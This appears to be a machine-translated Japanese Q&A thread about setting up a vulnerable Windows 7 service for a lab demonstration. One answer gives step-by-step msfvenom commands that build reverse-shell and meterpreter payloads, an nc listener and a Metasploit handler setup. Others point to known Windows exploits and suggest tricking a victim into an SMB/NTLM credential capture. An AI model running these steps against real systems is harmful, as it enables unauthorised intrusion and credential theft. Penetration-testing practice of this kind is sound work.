web-dev-qa-db-ja.com

Windows 7の脆弱なサービスをインストールする

リモートシェルを取得するためにWindows 7を利用する必要があるプロジェクトやデモンストレーションがあります。

Windows 7マシンでnessusを使用して脆弱性スキャンを実行しましたが、目標を達成できるような種類の脆弱性は見つかりませんでした。

私のWindows 7マシンにインストールできるバッファオーバーフローを含む脆弱なサービスがあり、それを使用してそのマシンをmetasploitでリモートで悪用することができます。

詳細:

  • 私が利用しようとしているマシンは私のものなので、すべてが合法です。

  • 私は最新バージョンのmetasploitでUbuntu 15.10を使用しています(kaliリポジトリからインストールしました)。

4
Sidahmed

私はこのftpを使用しました vulnerability (@halfinformedがコメントで私にくれました)。

だからここに簡単な逆シェルでインストールして悪用する手順があります:

  1. 上記のリンクから脆弱なサービスをインストールします。
  2. このコマンドmsfvenom -a x86 --platform windows -p windows/Shell_reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f pythonを使用して、(IPアドレスに応じて)ニーズに合った新しいペイロードを生成します。
  3. エクスプロイトスクリプトのペイロードを、前のコマンドで生成されたペイロードに置き換えます(23行目から55行目)。
  4. エクスプロイトスクリプト内の被害者のIPアドレスを置き換えます(61行目)。
  5. コマンドnc -nlpv 4444を使用して、別の端末でnetcatをリスニングします。
  6. python path_to_exlpoit_script.pyを使用してエクスプロイトスクリプトを起動します。
  7. Ncを起動したターミナルに移動すると、リバースシェルが待っています。

Meterpreterペイロードで悪用したくない場合は、手順2と5を変更する必要があります。

  1. このコマンドmsfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f pythonを使用して、ニーズに合ったmeterpreterペイロードを生成します。

  2. 別の端末でmeterpreterで聞いてください。これを行うには、metasploitを開いてuse exploit/multi/handlerと入力します。次にset payload windows/meterpreter/reverse_tcp;次にset lhost your_ip_address;次にset lport 4444;最後にexploit

1
Sidahmed

Windows 7マシンに完全にパッチを適用/更新する必要がないことを前提として、ユーザーアカウント制御(UAC)を無効にしてWindows 7のバニラ(更新を適用しない)コピーを実行し、MS10-046を利用することができます。

MS10-046は重大な脆弱性であり、潜在的な攻撃者がローカルユーザーと同じレベルのユーザー権限を取得する可能性があります(ほとんどの平均的なジョーは管理者権限を持つアカウントを使用します)。この脆弱性は、Windows 7の32ビットバージョンと64ビットバージョンの両方に影響を及ぼします。

エクスプロイトは、悪意のあるダイナミックリンクライブラリ(DLL)ファイルを指すアイコンリソースを持つ.LNKファイルの処理に関連しています。

必要がバッファオーバーフローの脆弱性であるかどうかを明確に知らなくても、これでうまくいくか、意図的に脆弱性を残したMetasploitableのようなディストリビューションを使用することもできます。

3
1ntgr

Windows 7から8、そしておそらく10で利用可能なエクスプロイトがいくつかあります(MS14-064など)。

ここで検索できます: http://www.intelligentexploit.com/search-results.html?search=Microsoft+Windows

それ以外の場合は、マシンにインストールされているプログラムをターゲットにすることができます。 http://www.exploit-db.com を参照してください

それ以外の場合は、被害者をだましてターゲットサーバーにアクセスさせ、有名なSMB/NTLMキャプチャを常に試すことができます。

PS:私はここに2つ以上のリンクを追加できませんでしたが、DM me @haxorhead。

1
gremlin0x00